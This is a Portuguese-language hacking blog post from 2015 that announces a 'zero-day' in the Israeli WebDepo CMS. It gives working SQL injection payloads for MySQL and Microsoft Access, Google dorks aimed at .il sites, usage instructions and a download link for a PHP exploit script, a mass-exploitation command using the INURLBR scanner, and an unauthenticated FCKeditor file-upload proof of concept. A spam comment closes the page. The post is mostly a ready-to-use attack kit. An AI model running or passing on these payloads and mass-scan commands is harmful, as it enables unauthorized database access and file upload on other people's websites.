sexta-feira, 27 de março de 2015

(0DAY) WebDepo - SQL injection

EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.

AUTOR:       GoogleINURL
Blog:             http://blog.inurl.com.br
Twitter:         https://twitter.com/googleinurl
Fanpage:       https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:              https://github.com/googleinurl
PSS:              http://packetstormsecurity.com/user/googleinurl
YOUTUBE:  http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil



VENTOR:         http://www.webdepot.co.il
GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])
  -----------------------------------------------------------------------------

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:      +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  -----------------------------------------------------------------------------

http://target.us/text.asp?wood=(id)+Exploit

GOOGLE DORK:   inurl:"text.asp?wood="
GOOGLE DORK:   site:il inurl:"text.asp?wood="
GOOGLE DORK:   site:com inurl:"text.asp?wood="  

Exploit:

Execute exploit:
--help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php WebDepoxpl.php -t target
  php WebDepoxpl.php -f targets.txt
  php WebDepoxpl.php -t target -p 'http://localhost:9090'

DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k
  -----------------------------------------------------------------------------

EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"


EXPLOIT MASS USE SCANNER INURLBR COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"

DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

VÍDEO 
  -----------------------------------------------------------------------------

A segunda falha:
Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

A segunda falha: Exploit fckeditor 2015  GOOGLE DORK: inurl:"/text.asp?wood=" site:il Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

[2] - http://target.us/userfiles/file/{YOU_FILE}

Um comentário:

  1. The IVR System allows the caller to communicate through the phone system which is connected to the computer system to make a transaction or to get information from the company.ivr technology is the way of information exchanging with no need of any other company employee to assist

    ResponderExcluir

............